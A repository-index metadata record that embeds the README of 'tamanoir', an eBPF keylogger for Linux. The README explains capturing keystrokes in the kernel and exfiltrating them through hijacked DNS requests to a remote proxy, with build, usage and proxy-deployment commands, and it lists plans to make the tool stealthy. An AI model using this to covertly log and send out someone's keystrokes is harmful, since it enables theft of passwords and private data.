{"id":22353433,"url":"https://github.com/pythops/tamanoir","last_synced_at":"2025-02-26T17:09:18.701Z","repository":{"id":266247053,"uuid":"875383720","full_name":"pythops/tamanoir","owner":"pythops","description":" A KeyLogger using eBPF 🐝","archived":false,"fork":false,"pushed_at":"2025-01-13T21:48:16.000Z","size":313,"stargazers_count":195,"open_issues_count":2,"forks_count":12,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-02-19T16:12:12.435Z","etag":null,"topics":["aya","ebpf","hacking","keylogger","linux","rust","security"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pythops.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"pythops"}},"created_at":"2024-10-19T20:34:40.000Z","updated_at":"2025-02-16T02:52:13.000Z","dependencies_parsed_at":"2025-01-15T11:11:31.903Z","dependency_job_id":"c0b93051-93e0-4d80-aa2b-fb8b11328e84","html_url":"https://github.com/pythops/tamanoir","commit_stats":null,"previous_names":["pythops/tamanoir"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pythops%2Ftamanoir","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pythops%2Ftamanoir/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pythops%2Ftamanoir/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pythops%2Ftamanoir/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pythops","download_url":"https://codeload.github.com/pythops/tamanoir/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240898276,"owners_count":19875151,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aya","ebpf","hacking","keylogger","linux","rust","security"],"created_at":"2024-12-04T13:08:26.912Z","updated_at":"2025-02-26T17:09:18.680Z","avatar_url":"https://github.com/pythops.png","language":"Rust","readme":"\u003cdiv align=\"center\"\u003e\n  \u003ch1\u003e Tamanoir \u003cbr\u003e A KeyLogger using eBPF 🐝 \u003c/h1\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/47b8a0ef-6a52-4e2d-8188-e77bb9e98d79\" style=\"width: 40%; height: 40%\"\u003c/img\u003e\n  \u003cp\u003e\u003csmall\u003e\n    \u003ci\u003e\n      A large anteater of Central and South America, Myrmecophaga tridactyla\n    \u003c/i\u003e\n  \u003c/small\u003e\u003c/p\u003e\n\u003c/div\u003e\n\n## 💡Overview\n\n\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/24f80020-9d60-4f2a-825b-ed56574dfb24\" \u003c/img\u003e\n\u003c/div\u003e\n\n1. Capture keystrokes and store them in a queue in the kernel.\n2. Intercept DNS requests and inject the captured keystroes in the DNS payload then redirect the request designated remote server acting as a DNS proxy.\n3. On the remote server, extract the keys from the DNS payload and send a valid DNS response.\n4. Intercept the response and modify its source address so the initial request will complete successfully.\n\n\u003cbr\u003e\n\n## 🚀 Setup\n\nYou need a Linux based OS.\n\n### ⚒️ Build from source\n\nTo build from source, make sure you have:\n\n- [bpf-linker](https://github.com/aya-rs/bpf-linker) installed.\n- [Rust](https://www.rust-lang.org/tools/install) installed with `nightly` toolchain.\n\n#### 1. Build ebpf program\n\n```\ncd tamanoir-ebpf\ncargo build --release\n```\n\n#### 2. Build user space program\n\n```\ncargo build --release\n```\n\nThis will produce an executable file at `target/release/tamanoir` that you can copy to a directory in your `$PATH`\n\n### 📥 Binary release\n\nYou can download the pre-built binaries from the [release page](https://github.com/pythops/tamanoir/releases)\n\n\u003cbr\u003e\n\n## 🪄 Usage\n\n### Tamanoir\n\n```\nRUST_LOG=info sudo -E tamanoir \\\n              --proxy-ip \u003cDNS proxy IP\u003e \\\n              --hijack-ip \u003clocally configured DNS server IP\u003e \\\n              --layout \u003ckeyboard layout\u003e \\\n              --iface \u003cnetwork interface name\u003e\n```\n\nfor example:\n\n```\nRUST_LOG=info sudo -E tamanoir \\\n              --proxy-ip 192.168.1.75 \\\n              --hijack-ip 8.8.8.8 \\\n              --layout 0 \\\n              --iface wlan0\n```\n\nCurrenly, there are two supported keyboard layouts:\n\n`0` : qwerty (us)\n\n`1` : azerty (fr)\n\n\u003cbr\u003e\n\n### DNS Proxy\n\nOn a remote host, make sure you have [docker](https://docs.docker.com/engine/install/) installed.\n\n#### 1. Build proxy image\n\n```\ncd proxy\ndocker build -t proxy .\n```\n\n#### 2. Run proxy\n\n\u003e [!NOTE]\n\u003e Make sure port 53 is available\n\n```\ndocker run --rm -it -p 53:53/udp -e PAYLOAD_LEN=8 proxy\n```\n\n\u003cbr\u003e\n\n## 🛠️TODO\n\n- [ ] Automatic discovery of the configured local dns server\n- [ ] Automatic discovery of the keyboard layout\n- [ ] Rewrite the DNS proxy in Rust\n- [ ] Make `Tamanoir` stealth (hide used ebpf maps and programs, process pid ...)\n\n\u003cbr\u003e\n\n## ⚠️ Disclaimer\n\n`Tamanoir` is developed for educational purposes only\n\n\u003cbr\u003e\n\n## ✍️ Authors\n\n[Badr Badri](https://github.com/pythops)\n\n[Adrien Gaultier](https://github.com/adgaultier)\n\n\u003cbr\u003e\n\n## ⚖️ License\n\nGPLv3\n","funding_links":["https://github.com/sponsors/pythops"],"categories":["Rust","Small Tools that Use Aya"],"sub_categories":["Aya-related talks"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpythops%2Ftamanoir","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpythops%2Ftamanoir","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpythops%2Ftamanoir/lists"}